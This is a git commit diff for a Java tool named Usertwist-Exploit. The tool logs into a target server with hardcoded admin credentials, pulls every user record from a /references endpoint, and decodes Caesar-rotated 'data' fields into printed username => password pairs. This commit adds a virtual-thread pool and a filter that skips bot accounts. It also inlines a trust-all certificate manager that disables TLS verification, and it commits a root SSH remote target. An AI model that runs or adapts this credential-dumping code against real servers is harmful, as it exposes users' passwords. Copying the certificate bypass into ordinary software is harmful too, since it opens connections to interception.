Implement Thread pools

.idea/git_toolbox_blame.xml

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="GitToolBoxBlameSettings">
+    <option name="version" value="2" />
+  </component>
+</project>

.idea/git_toolbox_prj.xml

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="GitToolBoxProjectSettings">
+    <option name="commitMessageIssueKeyValidationOverride">
+      <BoolValueOverride>
+        <option name="enabled" value="true" />
+      </BoolValueOverride>
+    </option>
+    <option name="commitMessageValidationEnabledOverride">
+      <BoolValueOverride>
+        <option name="enabled" value="true" />
+      </BoolValueOverride>
+    </option>
+  </component>
+</project>

.idea/inspectionProfiles/Project_Default.xml

@@ -2,7 +2,7 @@
   <profile version="1.0">
     <option name="myName" value="Project Default" />
     <inspection_tool class="AutoCloseableResource" enabled="true" level="WARNING" enabled_by_default="true">
-      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build" />
+      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient,java.net.http.HttpClient.Builder,build,java.util.concurrent.Executors,newFixedThreadPool|newVirtualThreadPerTaskExecutor" />
     </inspection_tool>
   </profile>
 </component>

.idea/remote-targets.xml

@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="RemoteTargetsManager">
+    <targets>
+      <target name="root@kyosu.fr:22" type="ssh/sftp" uuid="cb79b708-e728-4225-8df7-941abd57c841">
+        <config>
+          <option name="projectRootOnTarget" value="/root/Usertwist-Exploit" />
+          <option name="serverName" value="root@kyosu.fr:22 password" />
+        </config>
+        <ContributedStateBase type="JavaLanguageRuntime">
+          <config>
+            <option name="homePath" value="/opt/jdk-21.0.1" />
+            <option name="javaVersionString" value="17.0.11" />
+          </config>
+        </ContributedStateBase>
+      </target>
+    </targets>
+  </component>
+</project>

src/fr/motysten/usertwist/exploit/Main.java

@@ -16,6 +16,7 @@ import java.security.NoSuchAlgorithmException;
 import java.util.Arrays;
 import java.util.HashMap;
 import java.util.Map;
+import java.util.concurrent.ExecutionException;
 
 public class Main {
 
@@ -24,12 +25,15 @@ public class Main {
     public static String password = "AdminSecret1C";
     public static String port = "443";
     public static int rotation = 4;
-    public static boolean insecure = false;
     public static boolean asynchronous = true;
+    public static Request requestClient;
+    public static boolean ignoreBots = true;
 
-    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
+    public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException, ExecutionException {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
+        requestClient = new Request(false);
+
         if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
             asynchronous = false;
         }
@@ -58,6 +62,10 @@ public class Main {
         readLine = reader.readLine();
         if (!readLine.isEmpty()) {rotation = Integer.parseInt(readLine);}
 
+        System.out.println("Do you want to ignore bot users ? [Y/n]");
+        readLine = reader.readLine();
+        if (readLine.equalsIgnoreCase("n")) {ignoreBots = false;}
+
         JSONObject requestJSON = new JSONObject();
         requestJSON.put("username", username);
         requestJSON.put("password", password);
@@ -69,7 +77,7 @@ public class Main {
         boolean tokenFound = false;
         while (!tokenFound) {
             try {
-                response = Request.get(link, port, "/login", requestJSON, null, insecure);
+                response = requestClient.get(link, port, "/login", requestJSON, null);
                 if (response.statusCode() == 308) {
                     System.err.println("The server is trying to force HTTPS use. Would you like to retry with HTTPS ? [Y/n]");
                     if (reader.readLine().equalsIgnoreCase("n")) {
@@ -88,7 +96,7 @@ public class Main {
                     System.err.println("Operation aborted ! Security failure.");
                     System.exit(1);
                 } else {
-                    insecure = true;
+                    requestClient = new Request(true);
                 }
             } catch (SSLException e) {
                 if (e.getMessage().contains("plaintext connection?")) {
@@ -108,8 +116,6 @@ public class Main {
             System.exit(1);
         }
 
-        System.out.println(response.statusCode());
-
         JSONObject responseObject = new JSONObject(response.body());
         String token = responseObject.optString("token");
 
@@ -124,7 +130,7 @@ public class Main {
         Map<String, String> headers = new HashMap<>();
         headers.put("Authorization", "Bearer " + token);
 
-        response = Request.get(link, port, "/references", requestJSON, headers, insecure);
+        response = requestClient.get(link, port, "/references", requestJSON, headers);
         JSONArray usersArray = new JSONArray(response.body());
 
         System.out.println(usersArray.length() + " users found !");
@@ -132,9 +138,9 @@ public class Main {
 
         float startTime = System.nanoTime();
         if (asynchronous) {
-            Parser.asyncGetPass(usersArray, rotation);
+            Parser.asyncGetPass(usersArray, rotation, ignoreBots);
         } else {
-            Parser.getPass(usersArray, rotation);
+            Parser.getPass(usersArray, rotation, ignoreBots);
         }
         float elapsedTime = (System.nanoTime() - startTime) / 1000000;
         System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms");

src/fr/motysten/usertwist/exploit/tools/Parser.java

@@ -3,31 +3,54 @@ package fr.motysten.usertwist.exploit.tools;
 import org.json.JSONArray;
 import org.json.JSONObject;
 
+import java.util.ArrayList;
+import java.util.List;
+import java.util.concurrent.ExecutionException;
+import java.util.concurrent.ExecutorService;
+import java.util.concurrent.Executors;
+import java.util.concurrent.Future;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
 public class Parser {
 
-    public static void getPass(JSONArray usersArray, int rotation) {
-        for (int i = 0; i < usersArray.length(); i++) {
-            JSONObject user = usersArray.getJSONObject(i);
-            String login = user.getString("username");
-            String password = Cesar.rotate(user.getString("data"), rotation);
+    private static final String regex = "(^[A-Z][A-Za-z]+[0-9][A-Z])|(^.*?([A-Z]|[0-9]{3}).*?[,?;.:/!§%*^¨$£+])";
+    private static final Pattern pattern = Pattern.compile(regex);
 
-            System.out.println((i + 1) + ". " + login + " => " + password);
+    public static void getPass(JSONArray usersArray, int rotation, boolean ignoreBots) {
+        for (int i = 0; i < usersArray.length(); i++) {
+            parseJSON(usersArray, rotation, ignoreBots, i);
         }
     }
 
-    public static void asyncGetPass(JSONArray usersArray, int rotation) {
+    public static void asyncGetPass(JSONArray usersArray, int rotation, boolean ignoreBots) throws ExecutionException, InterruptedException {
+
+        ExecutorService executor = Executors.newVirtualThreadPerTaskExecutor();
+        List<Future<String>> threads = new ArrayList<>();
 
         for (int i = 0; i < usersArray.length(); i++) {
 
             int finalI = i;
-            new Thread(() -> {
-                JSONObject user = usersArray.getJSONObject(finalI);
-                String login = user.getString("username");
-                String password = Cesar.rotate(user.getString("data"), rotation);
-
-                System.out.println((finalI + 1) + ". " + login + " => " + password);
-            }).start();
+            Future<String> t = executor.submit(() -> parseJSON(usersArray, rotation, ignoreBots, finalI));
+            threads.add(t);
+        }
+        for (Future<String> t : threads) {
+            if (t.get() != null) {
+                System.out.println(t.get());
+            }
         }
     }
 
+    private static String parseJSON(JSONArray usersArray, int rotation, boolean ignoreBots, int finalI) {
+        JSONObject user = usersArray.getJSONObject(finalI);
+        String login = user.getString("username");
+        String password = Cesar.rotate(user.getString("data"), rotation);
+
+        final Matcher matcher = pattern.matcher(password);
+        if (!matcher.matches() || !ignoreBots) {
+            return (finalI + 1) + ". " + login + " => " + password;
+        }
+        return null;
+    }
+
 }

src/fr/motysten/usertwist/exploit/tools/Request.java

@@ -3,8 +3,11 @@ package fr.motysten.usertwist.exploit.tools;
 import org.json.JSONObject;
 
 import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLEngine;
 import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509ExtendedTrustManager;
 import java.io.IOException;
+import java.net.Socket;
 import java.net.URI;
 import java.net.http.HttpClient;
 import java.net.http.HttpRequest;
@@ -12,20 +15,59 @@ import java.net.http.HttpResponse;
 import java.security.KeyManagementException;
 import java.security.NoSuchAlgorithmException;
 import java.security.SecureRandom;
+import java.security.cert.X509Certificate;
 import java.util.Map;
 
 public class Request {
 
-    public static HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers, boolean insecure) throws NoSuchAlgorithmException, KeyManagementException, IOException, InterruptedException {
-        HttpClient client = HttpClient.newHttpClient();
+    private final HttpClient client;
 
+    public Request(boolean insecure) throws NoSuchAlgorithmException, KeyManagementException {
+        HttpClient.Builder builder = HttpClient.newBuilder();
         if (insecure) {
             SSLContext customContext = SSLContext.getInstance("TLS");
-            customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom());
+            customContext.init(null, new TrustManager[]{new X509ExtendedTrustManager() {
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
 
-            client = HttpClient.newBuilder().sslContext(customContext).build();
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
+
+                }
+
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
+
+                }
+
+                @Override
+                public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
+
+                }
+
+                @Override
+                public void checkServerTrusted(X509Certificate[] x509Certificates, String s) {
+
+                }
+
+                @Override
+                public X509Certificate[] getAcceptedIssuers() {
+                    return new X509Certificate[0];
+                }
+            }}, new SecureRandom());
+            builder.sslContext(customContext);
         }
+        this.client = builder.build();
+    }
 
+    public HttpResponse<String> get(String link, String port, String endpoint,JSONObject params, Map<String, String> headers) throws IOException, InterruptedException {
         HttpRequest.Builder builder = HttpRequest.newBuilder(URI.create(link + ":" + port + endpoint));
         if (headers != null) {
             for (Map.Entry<String, String> header : headers.entrySet()) {

src/fr/motysten/usertwist/exploit/tools/SSLBypass.java

@@ -1,43 +0,0 @@
-package fr.motysten.usertwist.exploit.tools;
-
-import javax.net.ssl.SSLEngine;
-import javax.net.ssl.X509ExtendedTrustManager;
-import java.net.Socket;
-import java.security.cert.X509Certificate;
-
-public class SSLBypass extends X509ExtendedTrustManager {
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, Socket socket) {
-
-    }
-
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s, SSLEngine sslEngine) {
-
-    }
-
-    @Override
-    public void checkClientTrusted(X509Certificate[] x509Certificates, String s) {
-
-    }
-
-    @Override
-    public void checkServerTrusted(X509Certificate[] x509Certificates, String s)  {
-
-    }
-
-    @Override
-    public X509Certificate[] getAcceptedIssuers() {
-        return new X509Certificate[0];
-    }
-}